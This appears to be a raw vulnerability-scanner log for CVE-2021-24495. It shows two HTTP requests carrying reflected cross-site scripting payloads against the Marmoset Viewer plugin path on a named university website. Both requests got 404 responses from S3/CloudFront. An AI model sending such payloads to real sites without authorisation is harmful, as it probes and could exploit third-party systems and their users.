[CVE-2021-24495] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%2730v0wAIxiSmZZLFc9Qpv7UwexDH%27)>


GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%2730v0wAIxiSmZZLFc9Qpv7UwexDH%27)> HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2021-24495] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%2730v0wAIxiSmZZLFc9Qpv7UwexDH%27)>

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 2
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:59 GMT
Server: AmazonS3
Via: 1.1 eafa30ac9eebc826d698b6b51868b24a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: QMnBUV1BY2Cw0yNlpvQfjp8agobLRCIFrv4LVuXzLKwON8iTLvHWBg==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: 2MP3SAEWT8QB0KK7</li>
<li>HostId: YxdRLMd/aAVzUvW3shK65D57rdzxEKPJyx3UiJWW9mc17qEQteQvpJ6wrPjHiydr3UhSQnSn7/Q=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

[CVE-2021-24495] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/30v0wAIxiSmZZLFc9Qpv7UwexDH/);marmoset.embed(%27a


GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/30v0wAIxiSmZZLFc9Qpv7UwexDH/);marmoset.embed(%27a HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2021-24495] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/30v0wAIxiSmZZLFc9Qpv7UwexDH/);marmoset.embed(%27a

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 2
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:59 GMT
Server: AmazonS3
Via: 1.1 ee011275acb236653ac4d031eb9a7092.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GvdinXyjGDYkEuSDiS-xFRsPdY6S8hSPqN73reqPyzyZCLjjpbxiWA==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: 2MP3SAEWT8QB0KK7</li>
<li>HostId: YxdRLMd/aAVzUvW3shK65D57rdzxEKPJyx3UiJWW9mc17qEQteQvpJ6wrPjHiydr3UhSQnSn7/Q=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

